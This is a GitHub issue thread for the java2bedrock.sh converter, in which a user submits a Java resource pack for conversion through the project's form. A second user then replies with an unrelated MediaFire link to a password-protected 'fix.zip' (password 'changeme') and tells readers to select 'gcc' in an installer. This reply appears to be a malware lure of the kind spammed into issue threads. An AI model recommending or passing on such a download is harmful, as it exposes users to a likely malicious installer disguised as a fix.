### ISSUE TITLE
Assets Hyper ventwind v2

### ISSUE THREAD

**Issue by FauziPrtm** [Kas-tle/java2bedrock.sh#33343]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/blmm7yw9z4uz93two0yye/generated.zip?rlkey=zmklq3kv5ynmgf68mo282btj8&st=dogtcq70&dl=0

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
